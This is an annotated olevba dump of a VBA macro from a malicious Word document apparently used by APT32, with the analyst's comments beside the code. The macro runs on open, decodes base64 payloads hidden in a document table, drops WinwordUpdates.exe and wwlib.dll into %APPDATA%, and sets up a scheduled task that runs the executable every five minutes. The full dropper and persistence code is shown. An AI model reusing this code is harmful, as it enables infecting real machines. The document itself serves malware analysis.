APT32 docs vba

1. olevba 0.53.1 - http://decalage.info/python/oletools
2. Flags        Filename                                                        
3. -----------  -----------------------------------------------------------------
4. MHT:MASIHB-- d1901f0b6266e4be23d805daaed7a10e1d0abcc5e30ed7c38803d13b80caf74d.doc
5. ===============================================================================
6. FILE: d1901f0b6266e4be23d805daaed7a10e1d0abcc5e30ed7c38803d13b80caf74d.doc
7. Type: MHTML
8. -------------------------------------------------------------------------------
9. VBA MACRO ThisDocument.cls
10. in file: None - OLE stream: u'VBA/ThisDocument'
11. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
12. Private Sub Document_Open()  
13.     Dim sAppData As String  // declare variables
14.     sAppData = Environ("APPDATA")   // get environment veriable https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/environ-function
15.     sAppData = sAppData & "\WinwordUpdates.exe"  // string concatenation
16.     Dim sAppData1 As String
17.     sAppData1 = Environ("APPDATA") 
18.     sAppData1 = sAppData1 & "\wwlib.dll"
19.    
20.     Dim b As String
21.     Dim a As String
22.     Dim tableNew As Table   // Table object type https://docs.microsoft.com/en-us/office/vba/api/word.table
23.     Set tableNew = ActiveDocument.Tables(1) // Get first table of the active document https://docs.microsoft.com/en-us/office/vba/api/word.table
24.     a = tableNew.Cell(1, 1).Range.Text  // at (row, column)
25.     a = Left(a, Len(a) - 2) // slice [:len]
26.     b = Base64Decode(a) // invoke function
27.     Dim fso As Object   // like Object in java (object-oriented) https://docs.microsoft.com/en-us/office/vba/language/concepts/getting-started/creating-object-variables
28.     Set fso = CreateObject("Scripting.FileSystemObject") // File system object  https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/filesystemobject-object
29.     Dim oFile As Object
30.     Set oFile = fso.CreateTextFile(sAppData)     // get handle to the stream https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/textstream-object
31.     oFile.Write b  
32.     oFile.Close         // drop WinwordUpdates.exe to %APPDATA%\WinwordUpdates.exe
33.    
34.     Dim c As String   // similar
35.     Dim d As String
36.     c = tableNew.Cell(1, 2).Range.Text
37.     c = Left(c, Len(c) - 2)
38.     d = Base64Decode(c)
39.     Dim fso1 As Object
40.     Set fso1 = CreateObject("Scripting.FileSystemObject")
41.     Dim oFile1 As Object
42.     Set oFile1 = fso1.CreateTextFile(sAppData1)
43.     oFile1.Write d
44.     oFile1.Close // drop wwlib.dll to %APPDATA%\WinwordUpdates.exe
45.    
46.     yiBhyERIualWRmBjcsIbCZLq  // call function with no parameter
47.     Set fso = Nothing  // set to null https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/nothing-keyword
48.     Set oFile = Nothing
49.     Set fso1 = Nothing
50.     Set oFile1 = Nothing
51. End Sub
52.  
53. Function Base64Decode(ByVal base64String) As String      // self-explained
54.   Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
55.   Dim dataLength, sOut, groupBegin
56.  
57.   base64String = Replace(base64String, vbCrLf, "")
58.   base64String = Replace(base64String, vbTab, "")
59.   base64String = Replace(base64String, " ", "")
60.  
61.   dataLength = Len(base64String)
62.   If dataLength Mod 4 <> 0 Then
63.     Err.Raise 1, "Base64Decode", "Bad Base64 string."
64.     Exit Function
65.   End If
66.  
67.   For groupBegin = 1 To dataLength Step 4
68.     Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
69.     numDataBytes = 3
70.     nGroup = 0
71.  
72.     For CharCounter = 0 To 3
73.  
74.       thisChar = Mid(base64String, groupBegin + CharCounter, 1)
75.  
76.       If thisChar = "=" Then
77.         numDataBytes = numDataBytes - 1
78.         thisData = 0
79.       Else
80.         thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
81.       End If
82.       If thisData = -1 Then
83.         Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
84.         Exit Function
85.       End If
86.  
87.       nGroup = 64 * nGroup + thisData
88.     Next
89.  
90.     nGroup = Hex(nGroup)
91.  
92.     nGroup = String(6 - Len(nGroup), "0") & nGroup
93.  
94.     pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
95.       Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
96.       Chr(CByte("&H" & Mid(nGroup, 5, 2)))
97.    
98.     sOut = sOut & Left(pOut, numDataBytes)
99.   Next
100.  
101.   Base64Decode = sOut
102. End Function
103.  
104. Function yiBhyERIualWRmBjcsIbCZLq()  // Template Code https://docs.microsoft.com/en-us/windows/desktop/taskschd/daily-trigger-example--scripting-
105.     Dim sAppData As String
106.     sAppData = Environ("APPDATA")
107.     sAppData = sAppData & "\WinwordUpdates.exe"
108.     Const TriggerTypeTime = 1
109.     Const ActionTypeExec = 0
110.    
111.     Set service = CreateObject("Schedule.Service")  //  Create the TaskService object
112.     Call service.Connect
113.     Dim rootFolder
114.     Set rootFolder = service.GetFolder("\")
115.     Dim taskDefinition
116.     Set taskDefinition = service.NewTask(0)
117.     Dim principal   //   security logon method that is required to run the tasks https://docs.microsoft.com/en-us/windows/desktop/taskschd/principal-logontype
118.     Set principal = taskDefinition.principal
119.     principal.LogonType = 3 // User must already be logged on. The task will be run only in an existing interactive session
120.    
121.     Dim settings    // https://docs.microsoft.com/en-us/windows/desktop/taskschd/taskschedulerschema-settings-tasktype-element
122.     Set settings = taskDefinition.settings
123.     settings.Enabled = True
124.     settings.StartWhenAvailable = True
125.     settings.Hidden = False
126.    
127.     Dim triggers   // https://docs.microsoft.com/en-us/windows/desktop/taskschd/daily-trigger-example--scripting- ( see 4)
128.     Set triggers = taskDefinition.triggers  // https://docs.microsoft.com/en-us/windows/desktop/taskschd/taskdefinition-triggers
129.     Dim trigger
130.     Set trigger = triggers.Create(TriggerTypeTime)
131.    
132.     Dim startTime, endTime
133.     Dim time
134.     time = DateAdd("s", 30, Now)
135.     startTime = XmlTime(time)
136.     trigger.StartBoundary = startTime // task runs after 30s
137.     trigger.Enabled = True
138.     Dim Repetition
139.     Set Repetition = trigger.Repetition
140.     Repetition.Interval = "PT" & "5" & "M"  // for 5 minues https://docs.microsoft.com/en-us/windows/desktop/taskschd/taskschedulerschema-duration-repetitiontype-element
141.    
142.     Dim Action
143.     Set Action = taskDefinition.Actions.Create(ActionTypeExec)
144.     Action.Path = sAppData
145.     Action.Arguments = ""
146.     Call rootFolder.RegisterTaskDefinition("WinwordUpdates", taskDefinition, 6, , , 3)
147.    
148. End Function
149. Function XmlTime(t)  // convert to xml format
150.     Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
151.     Dim tTime, tDate
152.     cSecond = "0" & Second(t)
153.     cMinute = "0" & Minute(t)
154.     CHour = "0" & Hour(t)
155.     cDay = "0" & Day(t)
156.     cMonth = "0" & Month(t)
157.     cYear = Year(t)
158.     tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & _
159.         ":" & Right(cSecond, 2)
160.     tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
161.     XmlTime = tDate & "T" & tTime
162. End Function
163.  
164.  
165.  
166.  
167.  
168.  
169.  
170.  
171.  
172.  
173.  
174.  
175.  
176.  
177.  
178. +------------+--------------------+-----------------------------------------+
179. | Type       | Keyword            | Description                             |
180. +------------+--------------------+-----------------------------------------+
181. | AutoExec   | Document_Open      | Runs when the Word or Publisher         |
182. |            |                    | document is opened                      |
183. | Suspicious | Chr                | May attempt to obfuscate specific       |
184. |            |                    | strings (use option --deobf to          |
185. |            |                    | deobfuscate)                            |
186. | Suspicious | CreateObject       | May create an OLE object                |
187. | Suspicious | CreateTextFile     | May create a text file                  |
188. | Suspicious | Environ            | May read system environment variables   |
189. | Suspicious | Write              | May write to a file (if combined with   |
190. |            |                    | Open)                                   |
191. | Suspicious | Hex Strings        | Hex-encoded strings were detected, may  |
192. |            |                    | be used to obfuscate strings (option    |
193. |            |                    | --decode to see all)                    |
194. | Suspicious | Base64 Strings     | Base64-encoded strings were detected,   |
195. |            |                    | may be used to obfuscate strings        |
196. |            |                    | (option --decode to see all)            |
197. | IOC        | WinwordUpdates.exe | Executable file name                    |
198. | IOC        | wwlib.dll          | Executable file name                    |
199. +------------+--------------------+-----------------------------------------+